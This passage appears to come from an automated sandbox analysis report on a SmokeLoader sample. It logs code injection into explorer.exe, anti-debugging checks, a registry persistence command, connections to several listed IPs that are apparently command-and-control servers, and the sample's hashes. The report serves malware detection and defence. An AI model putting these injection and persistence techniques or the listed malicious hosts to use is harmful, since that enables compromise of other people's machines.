Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_02EB70A3 push dword ptr fs:[00000030h]	13_2_02EB70A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A40042 push dword ptr fs:[00000030h]	13_2_04A40042

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_004278D5 GetProcessHeap,

9_2_004278D5

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004329BB SetUnhandledExceptionFilter,	9_2_004329BB
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004329BB SetUnhandledExceptionFilter,	14_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: dejcbcc.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.174.152.66 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.233.132.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.92.253.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.154.13.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.129.233 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.165.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.196.109.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.195.132.134 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

8_2_04A00110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Thread created: C:\Windows\explorer.exe EIP: 30019A0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Thread created: unknown EIP: 32019A0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Memory written: C:\Users\user\AppData\Local\Temp\33A3.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Memory written: C:\Users\user\AppData\Local\Temp\33A3.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00419F90

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart

Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2047599413.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3260994342.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.3261048206.0000000007AC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3260994342.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd.J
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0Progman
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2046328419.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_04A280F6 cpuid

8_2_04A280F6

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_04A33F87
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	8_2_04A2C8B7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	8_2_04A349EA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	8_2_04A3394D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_04A40AB6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	9_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	9_2_00438178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	9_2_00440116
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	9_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	9_2_00438423
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	9_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,	9_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	9_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	9_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	9_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	9_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	9_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	9_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	9_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	13_2_04A73F87
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	13_2_04A6C8B7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	13_2_04A749EA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	13_2_04A7394D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	13_2_04A80AB6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	14_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	14_2_00438178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	14_2_00440116
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	14_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	14_2_00438423
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	14_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,	14_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	14_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	14_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	14_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	14_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	14_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	14_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	14_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	14_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	14_2_00437F83

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_00409292 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00409292

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

9_2_0042FE47

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
XVM5nluelx.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1447254
Product:	CloudBasic
Start time:	17:37:14
Start date:	24.05.2024
Sample:	XVM5nluelx.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b6e3a49931797e98183072cf02f58d26
SHA1:	6ef79d91ad2f98e869a729f56280c507298ba0f3
SHA256:	6f480d8bf96773150f0939254a71eb20e447d30580aab7abf171ecb0e0094698
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report XVM5nluelx.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
XVM5nluelx.exe

Malware Threat Intel
Provided by